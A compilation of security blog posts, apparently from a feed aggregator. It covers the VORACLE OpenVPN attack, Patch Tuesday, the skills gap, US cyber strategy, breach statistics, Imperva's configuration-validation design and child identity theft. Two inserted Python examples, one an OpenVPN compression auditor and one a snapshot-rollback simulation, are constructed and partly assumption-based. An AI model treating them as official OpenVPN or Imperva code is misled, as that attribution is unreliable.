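The first precondition above is that OpenVPN compression is on, so a defender's most useful check is a quick audit of the VPN configuration. The script below is an added example, not code from the original post, from McAfee or from the OpenVPN project; the directive names comp-lzo, compress, allow-compression and push are OpenVPN's own, while the sample configs, their semantics as summarised in the docstring and the hostname vpn.example.test are assumptions constructed for the example.

```python
"""Audit OpenVPN client/server configs for the compression setting that
VORACLE depends on.  Added example, not code from the article or OpenVPN.

Directive semantics assumed from OpenVPN's documentation (not the article):
  comp-lzo [yes|no|adaptive]   legacy LZO; no mode means adaptive, and
                               'comp-lzo no' keeps framing but compresses nothing
  compress [lzo|lz4|lz4-v2|stub|stub-v2]
                               newer form; stub/stub-v2 or no algorithm = framing only
  allow-compression no         client refuses any non-stub compression, even if pushed
  push "<directive>"           server line that hands a directive to every client
The audit is deliberately conservative: any line that can turn compression on
counts as 'enabled' unless allow-compression no is present.
"""
import shlex

COMPRESSING = {"lzo", "lz4", "lz4-v2"}
FRAMING_ONLY = {"stub", "stub-v2"}


def parse_directives(config_text):
    """Yield (directive, args, pushed) per config line, unwrapping push "...".

    Lines starting with # or ; are OpenVPN comments and are skipped.
    """
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        try:
            tokens = shlex.split(line)   # keeps push "compress lz4" as one argument
        except ValueError:               # unbalanced quote: fall back to whitespace split
            tokens = line.split()
        if tokens[0] == "push" and len(tokens) > 1:
            inner = tokens[1].split()
            if inner:
                yield inner[0], inner[1:], True
            continue
        yield tokens[0], tokens[1:], False


def audit_compression(config_text):
    """Return {'compression': enabled|framing-only|disabled|unset, 'findings': [...]}.

    'enabled' is the state VORACLE needs; 'framing-only' carries the compression
    header but compresses nothing, so it does not give the attacker a length oracle.
    """
    findings, state, refused = [], "unset", False
    for directive, args, pushed in parse_directives(config_text):
        origin = "pushed by server" if pushed else "local"
        if directive == "comp-lzo":
            mode = args[0] if args else "adaptive"
            if mode == "no":
                findings.append(f"comp-lzo no ({origin}): framing only")
                state = state if state == "enabled" else "framing-only"
            else:
                findings.append(f"comp-lzo {mode} ({origin}): LZO compression on")
                state = "enabled"
        elif directive == "compress":
            algo = args[0] if args else "stub"
            if algo in COMPRESSING:
                findings.append(f"compress {algo} ({origin}): compression on")
                state = "enabled"
            elif algo in FRAMING_ONLY:
                findings.append(f"compress {algo} ({origin}): framing only")
                state = state if state == "enabled" else "framing-only"
            else:
                findings.append(f"compress {algo} ({origin}): unknown algorithm, review")
        elif directive == "allow-compression" and args and args[0] == "no":
            refused = True
            findings.append("allow-compression no: compression refused even if pushed")
    if refused:
        state = "disabled"
    return {"compression": state, "findings": findings}


# Constructed sample configs (vpn.example.test is a placeholder hostname).
CLIENT_LEGACY = "client\ndev tun\nremote vpn.example.test 1194\ncomp-lzo\n"
SERVER_PUSHING = 'server 10.8.0.0 255.255.255.0\n# applies to every client\npush "compress lz4"\n'
CLIENT_HARDENED = ("client\ndev tun\nremote vpn.example.test 1194\n"
                   "compress stub-v2\nallow-compression no\n")

if __name__ == "__main__":
    for name, cfg in [("legacy client", CLIENT_LEGACY),
                      ("pushing server", SERVER_PUSHING),
                      ("hardened client", CLIENT_HARDENED)]:
        result = audit_compression(cfg)
        print(f"{name}: compression {result['compression']}")
        for finding in result["findings"]:
            print("  -", finding)
```

Note that a server-side push line enables compression on every client that does not refuse it, which is why the hardened client config sets allow-compression no rather than relying on the server.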

Luckily the McAfee Safe Connect VPN was not built on the vulnerable OpenVPN code. That said, I want to take this opportunity to remind you of something we talk about a lot in the security industry: relying on only one layer of security is simply not enough today. Here are some tips and best practices to stay safe.

  • Set up multi-factor authentication whenever possible. This tip is especially important for valuable accounts like email or social media, which might be connected to financial information. With multi-factor authentication in place, you’ll be better protected by combining your usual login information with another layer of protection, such as a one-time password sent to your phone, biometrics (say, a thumbprint), or a security token that you’ll need to confirm before getting access to your account.
  • Use secure websites (HTTPS) whenever possible. The ‘S’ at the end of HTTPS stands for ‘Secure’. It means all communications between your browser and the website are encrypted. Most websites are moving toward this standard practice, so if you notice yourself landing on a website with just HTTP, stay alert.
  • Avoid making financial transactions until you’re on a network you trust. Sharing personal data like your credit card information can lead to unnecessary vulnerabilities. The best bet is to wait until you’re on your home network with additional layers of security such as McAfee’s Secure Home Platform already in place.
  • Consider using your mobile network and being your own hotspot. If your mobile or IoT data plan includes a hotspot, consider using that over Wi-Fi to avoid some of the challenges that come with it in the first place.
  • Do continue to use a personal VPN when you’re on the go and using Wi-Fi, just be sure to do so while having an additional layer of security in place so that if a similar vulnerability is discovered, you’ll already have a backup.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post The VORACLE OpenVPN Attack: What You Need to Know appeared first on McAfee Blogs.

Microsoft October Patch Tuesday Fixes 12 Critical Vulnerabilities

Microsoft has just released its latest monthly Patch Tuesday updates for October 2018, fixing a total of 49 security vulnerabilities in its products. This month's security updates address security vulnerabilities in Microsoft Windows, Edge Browser, Internet Explorer, MS Office, MS Office Services and Web Apps, ChakraCore, SQL Server Management Studio, and Exchange Server. Out of 49 flaws

Let’s Continue the Skills Gap Conversation

Most analysis suggests that the cybersecurity skills gap or shortage is getting worse. ESG reported in CSOOnline that 2018 had the highest levels yet, at 51%, of organizations that “claimed their organization had a problematic shortage of cybersecurity skills.”

It’s a complex problem, but one with, I believe, non-complex solutions.

The Problems (and the Solutions)

  • HR & How We Look at CyberSecJobs
  • Education
  • Tech Change
  • Increased Detection, and FPP (False Positives Phobia)

HR and How We Look at Jobs

This is a complex aspect of the complex problem. Cybersecurity is like healthcare, in that there isn’t one ‘job’ or role. Heart surgeons, lab technicians, and medical device designers are all part of that market, but the submarkets they occupy are very distinct and there is very little cross-market progression. Other areas of technology may be somewhat similar, but they don’t seem to have any more job-role and progression order than the unsorted pile of Lego that is cybersecurity. I’ve seen too many postings looking for 10 years’ experience with a security technology that is 5 years old, salary assignments that are 1/3rd of the going market rate for the described role, or great candidates not considered because they were filtered out when the word ‘cybersecurity’ or ‘C.I.S.S.P.’ (rather than CISSP) wasn’t in the CV. It’s so inefficient, and the more so because it amplifies the skills gap by narrowing the pool of candidates.

So what’s the fix? This one is the hardest on the list, so I put it first. There’s a systemic change needed here in how we describe roles and try to fill them. I’m pragmatic on this one, I believe: not until the companies and agencies who are looking for security people get frustrated enough will there be momentum to change.

Education and Certification

At the very front of the pipe, education is how we produce cybersecurity people. Not only has the education stream failed to produce the right number of people; because of the issues mentioned above in how we look at CyberSecJobs, post-secondary education has also been a big miss. Historically, post-secondary institutions have tried ‘jack of all trades’ programmes that produced graduates without the specialization to be quickly employable, having spent time smeared across too many disciplines. Think of that heart surgeon spending a term learning electronics QA processes. Product-specific training filled the gap, and this is successful if a candidate will be dealing with that product, but it’s a gamble that a prospective employer will use the products you are trained on. For non-hands-on or non-ops roles, certifications have been widespread, but mostly they have been too broad, like the CISSP, to really be a skills-gap filler, and the very specific certifications haven’t had the adoption to be recognized. The latter isn’t the fault of the certification bodies, but again the issue of too much tendency towards treating security as one big job bucket.

So what’s the fix? Greater links between industry and post-secondary education are a first step. Some post-secondary institutions are starting to move to post-graduation success tracking for cybersecurity, but only a few. Better practical linkage between foundation and application is needed, without overlaps. For example, foundations of firewalls should be a general course, and product-specific courses should build on that. There also needs to be better conversion training: an advanced admin of product X should have a better certification and training path to achieving a similar level on product Y. Otherwise certifications today are either the all-in-one CISSP or an alphabet soup that is effectively meaningless for filling jobs or assessing a provider. Government seems the help of last resort on non-product certifications, but I think we’re there. For all the investment and noise about the importance of cybersecurity, if the free market has failed with CISSP et al., then governments need to sponsor or assist (not direct) a re-invention of what gives those marks of achievement and progression (note those are plural, not a single certification) for our cybersecurity people. Heck, we do it for so many trades we rely on for trusted service, from mechanics to electricians; why not for the security that protects our lives and economy?

Tech Change

Security on its own has no value: it’s a verb that is applied to a technology. As technology changes, so must security. The challenge is that, unlike one technology changing on a cycle, any technology change in your business can have a security impact that needs addressing. This is the primary reason security appears so chaotic: it necessarily reacts to multiple sources of disruption. This isn’t going away.

So what’s the fix? More resilient security architectures that presume change. We have this already in some aspects, such as multi-cloud support in many security products for AWS, Azure, Google Cloud, VMware, et al. Another is how we fund and provision security. Some leading organizations tie the security budget to the IT budget in some way, and that becomes more important as a way to tie security investment to complexity.

Increased Detection, and FPP

Security has just gone through a wave of adding increased detection capability. This has been great for finding attacks that evade signatures or haven’t previously been seen. The downside is that this has led to a glut of events to process in some organizations. Increased detection has generally meant an increase in alerts that have lower confidence than purely signature-based methods. Of course there is high-fidelity non-signature alerting, but there’s clearly an increase in FPP (False Positives Phobia). All these extra alerts and extra indicators of compromise would be awesome if we had a matching increase in people, but we don’t.

So what’s the fix? This is the best opportunity on the list: taking all this new security information and getting refined value from it without throwing people at the issue. One big win is real machine learning (ML). True AI is the next step, but today assistance by ML is a real security force multiplier. Outsourcing through managed security service providers (MSSPs) has always been an option, but they too struggle with staffing, so a hybrid approach of ML+MSSP is very cool as a managed detection and response (MDR) option. Increasing feeds of alerts and information need to be matched with ML assistance where the ML doesn’t just produce more alerts needing human intervention.

The post Let’s Continue the Skills Gap Conversation appeared first on .

The US National Cyber Strategy

Last month, the White House released the "National Cyber Strategy of the United States of America." I generally don't have much to say about these sorts of documents. They're filled with broad generalities. Who can argue with:

Defend the homeland by protecting networks, systems, functions, and data;

Promote American prosperity by nurturing a secure, thriving digital economy and fostering strong domestic innovation;

Preserve peace and security by strengthening the ability of the United States, in concert with allies and partners, to deter and, if necessary, punish those who use cyber tools for malicious purposes; and

Expand American influence abroad to extend the key tenets of an open, interoperable, reliable, and secure Internet.

The devil is in the details, of course. And the strategy includes no details.

In a New York Times op-ed, Josephine Wolff argues that this new strategy, together with the more-detailed Department of Defense cyber strategy and the classified National Security Presidential Memorandum 13, represent a dangerous shift of US cybersecurity posture from defensive to offensive:

...the National Cyber Strategy represents an abrupt and reckless shift in how the United States government engages with adversaries online. Instead of continuing to focus on strengthening defensive technologies and minimizing the impact of security breaches, the Trump administration plans to ramp up offensive cyberoperations. The new goal: deter adversaries through pre-emptive cyberattacks and make other nations fear our retaliatory powers.

[...]

The Trump administration's shift to an offensive approach is designed to escalate cyber conflicts, and that escalation could be dangerous. Not only will it detract resources and attention from the more pressing issues of defense and risk management, but it will also encourage the government to act recklessly in directing cyberattacks at targets before they can be certain of who those targets are and what they are doing.

[...]

There is no evidence that pre-emptive cyberattacks will serve as effective deterrents to our adversaries in cyberspace. In fact, every time a country has initiated an unprompted cyberattack, it has invariably led to more conflict and has encouraged retaliatory breaches rather than deterring them. Nearly every major publicly known online intrusion that Russia or North Korea has perpetrated against the United States has had significant and unpleasant consequences.

Wolff is right; this is reckless. In Click Here to Kill Everybody, I argue for a "defense dominant" strategy: that while offense is essential for defense, when the two are in conflict, it should take a back seat to defense. It's more complicated than that, of course, and I devote a whole chapter to its implications. But as computers and the Internet become more critical to our lives and society, keeping them secure becomes more important than using them to attack others.

Four critical KPIs for securing your IT environment

In 2018, the average cost of a data breach is more than $3.75 million, and experts expect this number to rise in the coming years. This staggering—and potentially catastrophic—cost per incident is why implementing proper security practices is so important, so it is vital that enterprises both large and small understand how to secure their IT environments successfully. So, what should you be measuring when it comes to your security program? As the old saying … More

The post Four critical KPIs for securing your IT environment appeared first on Help Net Security.

945 data breaches led to compromise of 4.5 billion data records in first half of 2018

Gemalto released the latest findings of the Breach Level Index, a global database of public data breaches, revealing 945 data breaches led to 4.5 billion data records being compromised worldwide in the first half of 2018. Compared to the same period in 2017, the number of lost, stolen or compromised records increased by a staggering 133 percent, though the total number of breaches slightly decreased over the same period, signaling an increase in the severity … More

The post 945 data breaches led to compromise of 4.5 billion data records in first half of 2018 appeared first on Help Net Security.

Mobile security threats: Lack of visibility is putting businesses at risk

A significant lack of visibility into devices and networks is putting businesses at risk for data leakage and phishing attacks, according to a study conducted by Enterprise Mobility Exchange. The study showed that nearly 50 percent of mobile workers spend the majority of their worktime connected to non-corporate public Wi-Fi and carrier networks. Of that 50 percent, over 27 percent claim to connect to non-corporate owned networks more than 76 percent of the time. And, … More

The post Mobile security threats: Lack of visibility is putting businesses at risk appeared first on Help Net Security.

Health websites routinely share your activity with 57 third-parties

B9 Systems conducted research into the use of cookies by health websites and discovered that all the major players share your private information with, on average, 57 other websites. These include advertising & marketing websites, social media outlets and resellers. For many with a health problem, the first port of call is a quick online search in hope of self-diagnosis. Research has revealed that your activity doesn’t always stay with the website you visited. “It’s … More

The post Health websites routinely share your activity with 57 third-parties appeared first on Help Net Security.

Keeping your cloud malware-free: What you need to know

This year we’ve seen massive malware attacks spanning from nation state campaigns originating in North Korea and Russia to popular restaurants and everything in between. Each new incident serves as a grim reminder to business leaders that hackers will not relent. Yet with cloud adoption growing rapidly in the enterprise, the odds of a malware infection spreading and leading to a potential breach are increasing. According to a study conducted by the Ponemon Institute, almost … More

The post Keeping your cloud malware-free: What you need to know appeared first on Help Net Security.

DevOps and digital transformation initiatives are creating insecure apps

WhiteHat Security released its 2018 Application Security Statistics Report, “The Evolution of the Secure Software Lifecycle,” which identifies the security vulnerabilities and challenges introduced into the enterprise through traditional applications, and through agile development frameworks, microservices, APIs, and cloud architectures. One of the greatest concerns is that with few exceptions, the number of serious vulnerabilities per site has increased across all major industries, despite some improvements in finance, healthcare and retail. Unfortunately, these verticals are … More

The post DevOps and digital transformation initiatives are creating insecure apps appeared first on Help Net Security.

Global spending on security solutions to reach $133.7 billion in 2022

Worldwide spending on security-related hardware, software, and services is forecast to reach $133.7 billion in 2022, according to IDC. Although spending growth is expected to gradually slow over the 2017-2022 forecast period, the market will still deliver a compound annual growth rate (CAGR) of 9.9%. As a result, security spending in 2022 will be 45% greater than the $92.1 billion forecast for 2018. “Privacy has grabbed the attention of Boards of Directors as regions look … More

The post Global spending on security solutions to reach $133.7 billion in 2022 appeared first on Help Net Security.

Read: How To Build Resilient Cloud Configuration Shields

Configurable systems have a high level of flexibility and are better adapted to most customer needs, but their management isn’t a trivial task in complex cloud deployments.

The configuration management concept isn’t new and originated in the United States Department of Defense in the 1950s as a technical management discipline for hardware material items. In a software environment, it has a different meaning, but the concept remains the same.

Let’s take a closer look at why it’s so important in our system and how we handle it.

The Dilemma

Administrators, support engineers, and anyone else who deals with services or products like configuration. Product or service parameterization allows adjustment to customer needs exactly as the customer requires. This can be done by a small modification of the default configuration or by enabling or disabling a feature. Of course, the default settings should be simple and meet the need in most cases, but they do not fit all of them.

As developers, we hate configuration; it makes for messy code. Configuration creates complexity, and every parameter in it, and every change to it, adds additional testing. Since developers don't rule the world, however, we need to make do. On the other hand, we are responsible for providing a stable and reliable service, so how do we find a happy medium?

The simple answer to that would be “more unit-testing” or “more testing” to account for all possible scenarios, right? Well, some managers would agree, but the real world is a little bit more complicated than a Q/A lab. Our R&D and test automation teams are already doing a great job, but it’s not always enough since there are practically infinite combinations of configurations, and testing alone cannot mitigate the risk.

We know that configuration validation should be done in a real-time environment, so the Imperva Incapsula engineering team created a few mechanisms for self-protection. These mechanisms ensure close to zero impact for our customers in production, by checking correctness and fast recovery in the face of errors.

In this post, we’ll describe a few of those mechanisms, some basic, like schema validation, others more complicated, like configuration snapshot management.

Let’s kick it off with a simple configuration flow.

Configuration Flow

Customer configuration is transferred from one agent to another by employing what we refer to as a "shield". At each hop, the receiving agent ensures the configuration is correct. We do this to achieve two goals:

  1. Catch the problem as fast as possible, because early detection is crucial for a timely resolution
  2. Give some shields overlapping protection, for better detection

Let’s take a closer look at these shields. Every configuration asset is protected by several shields as described in the following illustration but not necessarily by all of them. Each shield is described below.

Management Console Configuration Shield

The Imperva Incapsula Management Console is used by both customers and operations staff. Its job is to receive configuration changes via the user interface or API, store them in the configuration database and notify the next agent that a configuration change has occurred.

The Management Console performs the following validations:

  • Schema correctness – configuration structure is correct for both database storage and runtime components. For example, data types validation.
  • Semantic correctness – any changed or added configuration is validated under its scope. For example, model state changes.
  • Data relationships – data should be correct relative to another component in the system. For example, customer site name or GRE tunnel IPs.

Once the problem is detected, the user is immediately notified and the configuration update is rejected.
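The three Management Console checks, as an added example that is not Imperva's code: the site model (name, state, gre_tunnel_ips), the allowed state transitions and the in-memory store of existing sites are assumptions constructed to show how an update is rejected by the first shield it fails, leaving the stored configuration untouched.

```python
import ipaddress

# Hypothetical lifecycle model: which state a single update may move a site to.
ALLOWED_TRANSITIONS = {
    "active": {"active", "paused", "deleted"},
    "paused": {"paused", "active", "deleted"},
    "deleted": {"deleted"},  # a deleted site cannot be revived by an update
}

# Field types both the database and the runtime components expect (assumption).
SCHEMA = {"name": str, "state": str, "gre_tunnel_ips": list}

# Constructed store of existing sites, keyed by site id.
SITES = {
    "s1": {"name": "shop", "state": "active", "gre_tunnel_ips": ["192.0.2.10"]},
    "s2": {"name": "blog", "state": "paused", "gre_tunnel_ips": ["192.0.2.20"]},
    "s3": {"name": "old", "state": "deleted", "gre_tunnel_ips": []},
}


class ConfigRejected(Exception):
    def __init__(self, shield, reason):
        super().__init__(f"{shield}: {reason}")
        self.shield = shield


def check_schema(update):
    """Schema correctness: every field present with the type storage and runtime expect."""
    for field, typ in SCHEMA.items():
        if field not in update:
            raise ConfigRejected("schema", f"missing field {field!r}")
        if not isinstance(update[field], typ):
            raise ConfigRejected("schema", f"{field!r} must be {typ.__name__}")
    if not all(isinstance(ip, str) for ip in update["gre_tunnel_ips"]):
        raise ConfigRejected("schema", "gre_tunnel_ips entries must be strings")


def check_semantics(current, update):
    """Semantic correctness: the change is legal within the site's own scope (state model)."""
    if update["state"] not in ALLOWED_TRANSITIONS:
        raise ConfigRejected("semantic", f"unknown state {update['state']!r}")
    before = current["state"] if current else "active"  # new sites start active (assumption)
    if update["state"] not in ALLOWED_TRANSITIONS[before]:
        raise ConfigRejected("semantic", f"cannot move {before} -> {update['state']}")


def check_relationships(site_id, update, sites):
    """Data relationships: values must be consistent with the other sites in the system."""
    seen = set()
    for raw in update["gre_tunnel_ips"]:
        try:
            ip = ipaddress.IPv4Address(raw)
        except ValueError:
            raise ConfigRejected("relationship", f"invalid GRE tunnel IP {raw!r}")
        if ip in seen:
            raise ConfigRejected("relationship", f"duplicate GRE tunnel IP {raw}")
        seen.add(ip)
    for other_id, other in sites.items():
        if other_id == site_id:
            continue
        if other["name"] == update["name"]:
            raise ConfigRejected("relationship", f"site name {update['name']!r} already in use")
        clash = seen & {ipaddress.IPv4Address(x) for x in other["gre_tunnel_ips"]}
        if clash:
            raise ConfigRejected("relationship", f"GRE tunnel IP {clash.pop()} belongs to {other_id}")


def apply_update(sites, site_id, update):
    """Run all three checks in order; commit only when every one passes."""
    check_schema(update)
    check_semantics(sites.get(site_id), update)
    check_relationships(site_id, update, sites)
    sites[site_id] = update
    return update


def try_update(sites, site_id, update):
    """Returns "accepted" or the name of the shield that rejected the change."""
    try:
        apply_update(sites, site_id, update)
        return "accepted"
    except ConfigRejected as exc:
        return exc.shield
```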

Configuration Sandbox Shield

In addition to performing static validations, Imperva Incapsula also sandboxes configuration changes in a live system before propagating them to the production network. The goal of this step is to detect unexpected issues with the configuration.

The configuration is loaded into fully operational runtime nodes, which try to detect the problem, anomaly or incorrect behavior. Note that the runtime nodes do not serve customer traffic. In the unlikely event that a configuration error is detected, the configuration change is isolated and will not affect customer traffic.

As described in the illustration, at this point valid configuration changes reach production nodes and affect customer traffic. However, issues that originate from unexpected traffic patterns can still show up, so an additional shield is required to ensure that such issues are handled gracefully.

Runtime Node Configuration Shield

Runtime nodes implement the last protection point, which allows them to recover from bad configuration changes, even ones that cause the process to abruptly terminate (crash). The mechanism keeps a Last Known Good (LKG) snapshot of the configuration repository and is able to revert to it when needed. As opposed to the previous shields, this one operates at the repository level. We chose that design because it can be very complicated to discover a single bad configuration change, and we want to recover as quickly as possible.

This shield’s implementation covers the following stages:

  • Background – the system maintains snapshots of LKG repositories
  • Detection – the system detects issues with the repository
  • Decision – the system decides whether a repository is safe to use or not
  • Rollback – the system reverts to an LKG repository
  • Recovery – once the configuration is fixed, the system recovers to the most recent version of the repository

This shield is our last line of defense, and we do not expect it to take action on a daily basis. However, if that occurs, our monitoring systems notify the relevant teams to immediately investigate and find the root cause of the issue, as described in our post: How to Tame “Monitorture” and Build a Developer-Friendly Monitoring Environment.

Runtime Node Configuration Shield Implementation

In this last section, I’d like to share some details about how we implemented the runtime node configuration shield.

We keep the configuration in files, so we wanted to find a solution at the file-system level. We evaluated several options for file-system snapshot management and decided to go with Btrfs storage, which is based on the copy-on-write (COW) principle. Btrfs has built-in snapshot functionality and meets our performance requirements.

Over Btrfs, we implemented a small open-source component, which is run as a service and creates snapshots for different repositories defined in our system. This component is generic and can be used by any product to achieve the same goal.

The following configuration is an example of possible repositories:

[Figure: Configuration example of this service]

A repository represents the Btrfs device managed by the snapper, while a snapshot_level defines a snapshot frequency and links to the latest snapshot taken at that level. Each repository can define several snapshot levels based on business logic or on the frequency of configuration changes.

The snapper creates snapshots periodically, as configured, but stops if any of the defined "stoppers" exist.

Runtime components use the master configuration until a configuration problem is detected. Once a problem is detected, the component tries to load the latest good snapshot configuration through the links defined in the configuration. In addition, a stopper is created (or the snapper is ordered to stop) so that the broken configuration is not snapshotted over the last known good one.
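The five stages of the runtime node shield (background snapshots, detection, decision, rollback, recovery) together with the stopper, as an added simulation that is not Imperva's snapper component. Btrfs snapshots are stood in for by plain directory copies and the "link to the latest snapshot" by a small pointer file, so it runs anywhere; the repository layout, level names, stopper file name and sample site.json are constructed.

```python
import json
import shutil
import tempfile
from pathlib import Path


class ConfigShield:
    def __init__(self, repo: Path, snapshot_root: Path, levels: dict):
        # repo: master configuration repository (stands in for the Btrfs subvolume)
        # levels: snapshot level name -> period in scheduler ticks, most frequent first
        self.repo = repo
        self.snapshot_root = snapshot_root
        self.levels = levels
        self.stopper = snapshot_root / "stopper"  # its presence halts snapshotting
        self.tick = 0
        snapshot_root.mkdir(parents=True, exist_ok=True)

    def take_snapshots(self) -> list:
        """Background: one scheduler tick; snapshot each level that is due, unless a stopper exists.
        Without the stopper a broken master would eventually be snapshotted over the LKG."""
        self.tick += 1
        if self.stopper.exists():
            return []
        taken = []
        for level, period in self.levels.items():
            if self.tick % period == 0:
                dest = self.snapshot_root / level / f"{self.tick:06d}"
                shutil.copytree(self.repo, dest)  # stands in for a Btrfs snapshot
                # 'latest' is the link to the newest snapshot of this level
                (self.snapshot_root / level / "latest").write_text(str(dest))
                taken.append(level)
        return taken

    @staticmethod
    def load(path: Path) -> dict:
        """Detection: load and sanity-check one repository. Raising here stands in for a
        runtime node that fails to start, or crashes, on a bad configuration."""
        cfg = json.loads((path / "site.json").read_text())
        if not isinstance(cfg.get("rate_limit"), int) or cfg["rate_limit"] <= 0:
            raise ValueError("rate_limit must be a positive integer")
        return cfg

    def load_with_fallback(self) -> tuple:
        """Decision, rollback and recovery. Returns (config, source) where source is
        "master" or "<level>:<snapshot>"."""
        try:
            cfg = self.load(self.repo)
            if self.stopper.exists():
                self.stopper.unlink()  # recovery: master is good again, snapshots resume
            return cfg, "master"
        except (ValueError, FileNotFoundError):
            self.stopper.touch()  # decision: freeze the LKG until the master is repaired
            for level in self.levels:  # rollback: newest usable snapshot, most frequent level first
                latest = self.snapshot_root / level / "latest"
                if not latest.exists():
                    continue
                snap = Path(latest.read_text())
                try:
                    return self.load(snap), f"{level}:{snap.name}"
                except (ValueError, FileNotFoundError):
                    continue  # this snapshot is bad too; fall through to a coarser level
            raise RuntimeError("no usable configuration in master or any snapshot")


def demo() -> dict:
    """Walk through a good push, a bad push, rollback, the stopper and recovery."""
    work = Path(tempfile.mkdtemp())
    repo = work / "repo"
    repo.mkdir()
    site = repo / "site.json"
    site.write_text(json.dumps({"site": "example", "rate_limit": 100}))  # constructed config
    shield = ConfigShield(repo, work / "snapshots", {"minute": 1, "hour": 3})
    for _ in range(3):
        shield.take_snapshots()  # ticks 1-3: three "minute" snapshots, one "hour" snapshot
    site.write_text(json.dumps({"site": "example", "rate_limit": "lots"}))  # bad push
    cfg, source = shield.load_with_fallback()
    snapshots_after_bad_push = shield.take_snapshots()  # stopper present: nothing taken
    site.write_text(json.dumps({"site": "example", "rate_limit": 200}))  # operator fixes it
    fixed_cfg, fixed_source = shield.load_with_fallback()
    result = {
        "rollback_source": source,
        "rollback_rate_limit": cfg["rate_limit"],
        "snapshots_after_bad_push": snapshots_after_bad_push,
        "stopper_cleared": not shield.stopper.exists(),
        "recovered_source": fixed_source,
        "recovered_rate_limit": fixed_cfg["rate_limit"],
    }
    shutil.rmtree(work)
    return result


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```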

We believe that similar techniques can be used in any cloud service. These mechanisms help us provide a reliable service and we strive for a reality in which they will not be activated. But if they are, our customers can rest easy.

#CyberAware: Teaching Kids to Get Fierce About Protecting Their Identity

It wasn’t Kiley’s fault, but that didn’t change the facts: The lending group denied her college loan due to poor credit, and she didn’t have a plan B. Shocked and numb, she began to dig a little deeper. She discovered that someone had racked up three hefty credit card bills using her Social Security Number (SSN) a few years earlier.

Her parents had a medical crisis and were unable to help with tuition, and Kiley’s scholarships didn’t cover the full tuition. With just months left before leaving to begin her freshman year at school, Kiley was forced to radically adjust her plans. She enrolled in the community college near home and spent her freshman year learning more than she ever imagined about identity protection and theft.

The Toll: Financial & Emotional

Unfortunately, these horror stories of childhood identity theft are all too real. According to Javelin Strategy & Research, more than 1 million children were the victim of identity fraud in 2017, resulting in losses of $2.6 billion and more than $540 million in out-of-pocket costs to the families.

The financial numbers don’t begin to reflect the emotional cost victims of identity theft often feel. According to the 2017 Identity Theft Aftermath report released by the Identity Theft Resource Center, victims report feeling enraged, severely distressed, angry, frustrated, paranoid, vulnerable, fearful, and — in 7% of the cases — even suicidal.

Wanted: Your Child’s SSN

Sadly, because of their clean credit history, cyber crooks love to target kids. Also, identity theft among kids often goes undiscovered for more extended periods of time. Thieves have been known to use a child’s identity to apply for government benefits, open bank or credit card accounts, apply for a loan or utility service, or rent a place to live. Often, until the child grows up and applies for a car or student loan, the theft goes undetected.

Where do hackers get the SSNs? Data breaches can occur at schools, pediatrician offices, and banks, and records can be taken in home robberies. A growing area of concern involves medical identity theft, which gives thieves the ability to access prescription drugs and even expensive medical treatments using someone else’s identity.

6 Ways to Build #CyberAware Kids

  1. Talk, act, repeat. Identity theft isn’t a big deal until it personally affects you or your family; only then, it’s too late. Discuss identity theft and its fallout with your kids. But don’t just talk — put protections in place. Remind your child (again) to keep personal information private. (Yes, this habit includes keeping passwords and personal data private even from BFFs!)
  2. Encourage kids to be digitally savvy. Help your child understand the tricks hackers play to steal the identities of innocent people. Identity thieves will befriend children online with the goal of gathering the personal information they need to steal their identity. Thieves are skilled at trolling social networks, looking at user profiles for birth dates, addresses, and names of family members to piece together the identity puzzle. Challenge your kids to be on the hunt for imposters and catfishes. Teach them to be suspicious about links, emails, texts, pop-up screens, and direct messages from “cute” but unknown peers on their social media accounts. Teach them to go with their instincts and examine websites, social accounts, and special shopping offers.
  3. Get fierce about data protection. Don’t be quick to share your child’s SSN or secondary information such as date of birth, address, and mother’s maiden name, and teach your kids to do the same. Also, never carry your child’s (or your) physical Social Security card in your wallet or purse. Keep it in a safe place, preferably under lock and key. Only share your child’s data when necessary (school registration, passport application, education savings plan, etc.) and only with trusted individuals.
  4. File a proactive fraud alert. By submitting a fraud alert in your child’s name with the credit bureaus several times a year, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days. When the time runs out, you’ll need to reactivate the alert. You can achieve the same thing by filing an earnings report from the Social Security Administration. The report will reveal any earnings acquired under your child’s Social Security number.
  5. Know the warning signs. If someone is using your child’s data, you may notice: 1) pre-approved credit card offers addressed to them arriving via mail; 2) collection agencies calling and asking to speak to your child; 3) court notices regarding delinquent bills. If any of these things happen, your first step is to call and freeze their credit with the three credit reporting agencies: Equifax, Experian, and TransUnion.
  6. Report theft. If you find a violation of your child’s credit of any kind, go to IdentityTheft.gov to report the crime and begin restoring your child’s credit. This site is easy to navigate and takes you step-by-step down the path of restoring stolen credit.

Building digitally resilient kids is one of the primary tasks of parents today. Part of that resilience is taking the time to talk about this new, digital frontier that is powerful but has a lot of security cracks in it that can negatively impact your family. Getting fierce about identity protection can save your child (and you) hours and even years of heartache and financial loss.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post #CyberAware: Teaching Kids to Get Fierce About Protecting Their Identity appeared first on McAfee Blogs.

BEC-as-a-Service: Hacked accounts available from $150

Digital Shadows has announced the findings of new research revealing the diversity of methods used to infiltrate company emails. The FBI has estimated that scams resulting from business email compromise – such as fake invoices and wire fraud – have cost businesses $12bn globally over the last five years. Email inboxes exposed While phishing is a common means of attack, the research reveals criminals are resorting to a wide variety of methods to access business … More

The post BEC-as-a-Service: Hacked accounts available from $150 appeared first on Help Net Security.

Most enterprises highly vulnerable to security events caused by cloud misconfiguration

Fugue released the results of its Cloud Infrastructure Misconfiguration Report. The survey of more than 300 IT professionals revealed that most enterprises are highly vulnerable to security events caused by cloud misconfiguration. Critical data breaches and system downtime events were among the many reported negative outcomes of misconfiguration. Misconfiguration can occur for a variety of reasons The key finding: while 92 percent of IT and security professionals reported concerns about security risks due to misconfiguration, … More

The post Most enterprises highly vulnerable to security events caused by cloud misconfiguration appeared first on Help Net Security.

Can we trust digital forensic evidence?

Research carried out at the University of York has suggested that more work is needed to show that digital forensic methods are robust enough to stand up to interrogation in a court of law. Digital forensics is the recovery and investigation of digital devices and digital materials, often related to serious crimes, such as terrorism and murder, but also more localised issues within the workplace such as employee misconduct and cyber bullying. New research at the … More

The post Can we trust digital forensic evidence? appeared first on Help Net Security.

NIST Seeks Public Comment on Managing Internet of Things Cybersecurity and Privacy Risks

